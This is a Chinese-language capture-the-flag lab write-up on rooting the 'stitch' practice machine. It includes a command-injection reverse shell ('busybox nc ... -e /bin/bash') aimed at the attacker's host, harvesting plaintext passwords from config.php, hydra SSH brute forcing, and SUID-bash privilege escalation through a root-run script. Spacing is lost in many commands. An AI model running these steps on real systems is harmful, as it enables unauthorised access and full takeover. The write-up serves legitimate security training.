stitch靶场学习笔记
- 正文
- 1、端口扫描
- 2、域名重定向
- 3、NC反弹
- 4、文件查找
- 5、iiiii用户登录
- 6、/HOME下多用户筛选
- 7、多用户爆破
- 8、iot_runner程序漏洞利用
正文
kali攻击机地址:192.168.1.4
靶场地址:192.168.1.19
1、端口扫描
在kali里,使用nmap工具:
nmap-sV-v-T4-A192.168.1.19
22和80端口是开放的。进入网页,发现域名stitch.dsz:
2、域名重定向
修改kali中hosts:
vi/etc/hosts进入hosts文件里,添加:
192.168.1.19 stitch.dsz:wq!退出,重新访问http://stitch.dsz,发现域名重定向了:
使用子域名扫描工具:
wfuzz-w/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt-ustitch.dsz-H'Host:FUZZ.stitch.dsz'--hw1348扫出来3个子域名,http://mail.stitch.dsz、http://dog.stitch.dsz、http://iot.stitch.dsz:
重新编辑kali里面的/etc/hosts文件:
192.168.1.19 stitch.dsz dog.stitch.dsz mail.stitch.dsz iot.Stitch.dsz顺便修改windows下的Hosts文件:
C:\Windows\System32\drivers\etc\hosts3、NC反弹
登录http://iot.stitch.dsz/,爆破用户名和密码的时候,可以对用户名构造nc连接语句:
;busyboxnc192.168.1.44444-e/bin/bash;
调整格式:
/usr/bin/script-qc/bin/bash /dev/null CTRL+Z stty raw -echo;fgreset xtermcd..find./4、文件查找
在/www目录下有个./dog/config.php文件:
可以发现里面存了一堆密码:
3c4900896d92da 3c4900896d92da789abc s3cur3P@ssw0rd5、iiiii用户登录
先拿iiiii:3c4900896d92da对应的用户名、密码远程访问iiiii用户:
su- iiiii6、/HOME下多用户筛选
筛选/home目录下的所有用户:
#写法1ls-al|awk'{print $NF}'#写法2,输出结果跳过前三行ls-al|awk' NR>3 {print $NF}'7、多用户爆破
hydra-Lusr.txt-Ppass1.txt ssh://192.168.1.19-I-enrs
切换iotuser用户后,发现可以执行iot_runner的脚本:
8、iot_runner程序漏洞利用
在iotuser用户下操作:
cd/tmpvia.sh IOT#chmod+s /bin/bashchmod600/tmp/a.sh
在iiiii用户下操作:
sudo/usr/bin/push_iot /tmp/a.sh
在iotuser用户下操作:
sudo/usr/bin/iot_runner a.shbash-p大致意思解释 :
(1)在iotuser下:创建恶意脚本
cd/tmp# 进入临时目录(所有人可写)via.sh# 创建脚本 a.sh脚本内容最关键:
chmod +s /bin/bashchmod +s:给文件设置SUID 权限/bin/bash:系统的 bash 命令行工具- 效果:让
/bin/bash变成任何人运行都直接获得 root 权限
(2)设置脚本权限
chmod600/tmp/a.sh- 让脚本只能被
iotuser读写 - 避免被其他用户修改或删除
(3)在iiiii用户下:把脚本推给 iot_runner
sudo/usr/bin/push_iot /tmp/a.sh作用:
- 将
/tmp/a.sh放到iot_runner可以执行的位置 - 让后面的
iot_runner能找到并运行它
( 4)回到iotuser:以 root 权限执行恶意脚本
sudo/usr/bin/iot_runner a.shiot_runner是root 权限运行它执行了你的
a.sha.sh执行:chmod+s /bin/bash结果:/bin/bash 获得了 SUID root 权限
(5)最终:拿到 root 权限
bash-p-p是什么?
- 保留SUID 权限
- 不降级权限
- 直接以root身份打开 shell
执行完这一句,你就已经从普通用户 → 变成 root了!